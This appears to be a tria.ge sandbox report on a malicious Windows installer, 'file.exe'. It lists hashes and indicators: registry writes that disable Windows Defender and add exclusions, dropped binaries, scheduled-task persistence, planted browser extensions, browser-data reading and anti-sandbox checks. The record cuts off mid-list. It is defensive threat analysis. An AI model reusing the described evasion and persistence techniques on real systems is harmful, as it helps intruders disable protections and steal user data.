Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
148s -
max time network
151s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
26/10/2022, 12:33
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
file.exe
Resource
win10v2004-20220812-en
General
-
Target
file.exe
-
Size
7.2MB
-
MD5
4c3bf9f44cb3b0beafd4fdbe47a64eeb
-
SHA1
fc3dfad3a7e2197857a94514a186bfcfeeaf6b00
-
SHA256
324edc8acd355934c63a1fcaa6c4793d681302fa49d4f5233eaeafdc366e34ab
-
SHA512
36cacdb10d8da5f6c5fbf0c176db314cfb23ff15154f95d3a07038e191ffeece9467feed41a3294a25797937d5ce60c197fc0ca554895b54c68381f261ec4622
-
SSDEEP
196608:91O/pWMv3UnNQzQSlz+qCpqFWoYICsTs7YT5OS++5TM8pPwGt:3OxWRnN7SYZIjTsq5OSw2t
Malware Config
Signatures
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\oQtMlHEnfKUn = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\hfmUoVlnDXXxKeVB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\hfmUoVlnDXXxKeVB = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\PtFLChdTWFkbMOwK = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\CrVpqlWoU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\AJYQrkrAhIRXC = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\lVrlTdgfhXOU2 = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\LcMDsXLSmMLmtBGQR = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\LcMDsXLSmMLmtBGQR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\lVrlTdgfhXOU2 = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\AJYQrkrAhIRXC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\LzmXMIHnPUltEyKLVfR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\oQtMlHEnfKUn = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\CrVpqlWoU = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\LzmXMIHnPUltEyKLVfR = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\PtFLChdTWFkbMOwK = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\PtFLChdTWFkbMOwK = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\PtFLChdTWFkbMOwK = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 29 1484 rundll32.exe -
Executes dropped EXE 4 IoCs
pid Process 1728 Install.exe 868 Install.exe 1152 SxTZwTC.exe 1588 XepbKYx.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Control Panel\International\Geo\Nation XepbKYx.exe -
Loads dropped DLL 12 IoCs
pid Process 1848 file.exe 1728 Install.exe 1728 Install.exe 1728 Install.exe 1728 Install.exe 868 Install.exe 868 Install.exe 868 Install.exe 1484 rundll32.exe 1484 rundll32.exe 1484 rundll32.exe 1484 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json XepbKYx.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\meejmcfbiapijdfaadackoblffmidlig\1.0.0.0\manifest.json XepbKYx.exe -
Drops file in System32 directory 23 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_7987E17ED77D800093D5BF3096E78D98 XepbKYx.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol SxTZwTC.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA XepbKYx.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_A49E2928C282F3D7B74BA1083F81B152 XepbKYx.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_A49E2928C282F3D7B74BA1083F81B152 XepbKYx.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_7987E17ED77D800093D5BF3096E78D98 XepbKYx.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat rundll32.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini SxTZwTC.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol SxTZwTC.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_7D7374C3BD488A38BC34DD9B008EDC62 XepbKYx.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat XepbKYx.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 XepbKYx.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 XepbKYx.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA XepbKYx.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_7D7374C3BD488A38BC34DD9B008EDC62 XepbKYx.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA XepbKYx.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA XepbKYx.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol XepbKYx.exe -
Drops file in Program Files directory 13 IoCs
description ioc Process File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak XepbKYx.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja XepbKYx.exe File created C:\Program Files (x86)\lVrlTdgfhXOU2\jSLWDUwpkCszk.dll XepbKYx.exe File created C:\Program Files (x86)\AJYQrkrAhIRXC\DFBTUBL.xml XepbKYx.exe File created C:\Program Files (x86)\LzmXMIHnPUltEyKLVfR\nkqMVQd.dll XepbKYx.exe File created C:\Program Files (x86)\LzmXMIHnPUltEyKLVfR\ZAxiNMW.xml XepbKYx.exe File created C:\Program Files (x86)\AJYQrkrAhIRXC\DLZZEJW.dll XepbKYx.exe File created C:\Program Files (x86)\CrVpqlWoU\SWUpCz.dll XepbKYx.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi XepbKYx.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi XepbKYx.exe File created C:\Program Files (x86)\CrVpqlWoU\AJxMqTE.xml XepbKYx.exe File created C:\Program Files (x86)\lVrlTdgfhXOU2\RAJmKwI.xml XepbKYx.exe File created C:\Program Files (x86)\oQtMlHEnfKUn\KumvZXO.dll XepbKYx.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\bKFjthDDlmdmBdSpYV.job schtasks.exe File created C:\Windows\Tasks\wLvsIRnBfEcGhlAOV.job schtasks.exe File created C:\Windows\Tasks\gJECdJUNuqvNlNQ.job schtasks.exe File created C:\Windows\Tasks\CDUwqlMPSeBRbvnPZ.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 13 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 712 schtasks.exe 932 schtasks.exe 1976 schtasks.exe 1360 schtasks.exe 1692 schtasks.exe 1308 schtasks.exe 1980 schtasks.exe 1032 schtasks.exe 1628 schtasks.exe 1912 schtasks.exe 2028 schtasks.exe 1860 schtasks.exe 828 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-b5-0c-0c-ba-7b\WpadDecisionTime = 60868f4b48e9d801 rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ XepbKYx.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs XepbKYx.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates XepbKYx.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs XepbKYx.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates XepbKYx.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host wscript.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" XepbKYx.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" XepbKYx.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA XepbKYx.exe Key created \REGISTRY\USER\.DEFAULT\Software wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs XepbKYx.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs XepbKYx.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs XepbKYx.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs XepbKYx.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AED597F6-057A-47AA-AF29-71E5DD934CE3}\0a-b5-0c-0c-ba-7b rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0008000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 XepbKYx.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-b5-0c-0c-ba-7b\WpadDecision = "0" XepbKYx.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root XepbKYx.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-b5-0c-0c-ba-7b\WpadDecisionReason = "1" rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs XepbKYx.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs XepbKYx.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates XepbKYx.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs XepbKYx.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings XepbKYx.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-b5-0c-0c-ba-7b\WpadDecisionTime = 60868f4b48e9d801 XepbKYx.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed XepbKYx.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates XepbKYx.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot XepbKYx.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust XepbKYx.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 XepbKYx.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections XepbKYx.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix XepbKYx.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My XepbKYx.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing XepbKYx.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs XepbKYx.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust XepbKYx.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AED597F6-057A-47AA-AF29-71E5DD934CE3}\WpadDecisionReason = "1" XepbKYx.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AED597F6-057A-47AA-AF29-71E5DD934CE3}\WpadDecision = "0" XepbKYx.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AED597F6-057A-47AA-AF29-71E5DD934CE3}\0a-b5-0c-0c-ba-7b XepbKYx.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates XepbKYx.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates XepbKYx.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-b5-0c-0c-ba-7b\WpadDecision = "0" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople XepbKYx.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs XepbKYx.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad XepbKYx.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AED597F6-057A-47AA-AF29-71E5DD934CE3}\WpadDecisionTime = 60868f4b48e9d801 XepbKYx.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs XepbKYx.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs XepbKYx.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed XepbKYx.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs XepbKYx.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 XepbKYx.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde XepbKYx.exe -
Suspicious behavior: EnumeratesProcesses 28 IoCs
pid Process 1968 powershell.EXE 1968 powershell.EXE 1968 powershell.EXE 1496 powershell.EXE 1496 powershell.EXE 1496 powershell.EXE 336 powershell.EXE 336 powershell.EXE 336 powershell.EXE 1596 powershell.EXE 1596 powershell.EXE 1596 powershell.EXE 1588 XepbKYx.exe 1588 XepbKYx.exe 1588 XepbKYx.exe 1588 XepbKYx.exe 1588 XepbKYx.exe 1588 XepbKYx.exe 1588 XepbKYx.exe 1588 XepbKYx.exe 1588 XepbKYx.exe 1588 XepbKYx.exe 1588 XepbKYx.exe 1588 XepbKYx.exe 1588 XepbKYx.exe 1588 XepbKYx.exe 1588 XepbKYx.exe 1588 XepbKYx.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1968 powershell.EXE Token: SeDebugPrivilege 1496 powershell.EXE Token: SeDebugPrivilege 336 powershell.EXE Token: SeDebugPrivilege 1596 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1848 wrote to memory of 1728 1848 file.exe 28 PID 1848 wrote to memory of 1728 1848 file.exe 28 PID 1848 wrote to memory of 1728 1848 file.exe 28 PID 1848 wrote to memory of 1728 1848 file.exe 28 PID 1848 wrote to memory of 1728 1848 file.exe 28 PID 1848 wrote to memory of 1728 1848 file.exe 28 PID 1848 wrote to memory of 1728 1848 file.exe 28 PID 1728 wrote to memory of 868 1728 Install.exe 29 PID 1728 wrote to memory of 868 1728 Install.exe 29 PID 1728 wrote to memory of 868 1728 Install.exe 29 PID 1728 wrote to memory of 868 1728 Install.exe 29 PID 1728 wrote to memory of 868 1728 Install.exe 29 PID 1728 wrote to memory of 868 1728 Install.exe 29 PID 1728 wrote to memory of 868 1728 Install.exe 29 PID 868 wrote to memory of 1932 868 Install.exe 31 PID 868 wrote to memory of 1932 868 Install.exe 31 PID 868 wrote to memory of 1932 868 Install.exe 31 PID 868 wrote to memory of 1932 868 Install.exe 31 PID 868 wrote to memory of 1932 868 Install.exe 31 PID 868 wrote to memory of 1932 868 Install.exe 31 PID 868 wrote to memory of 1932 868 Install.exe 31 PID 868 wrote to memory of 268 868 Install.exe 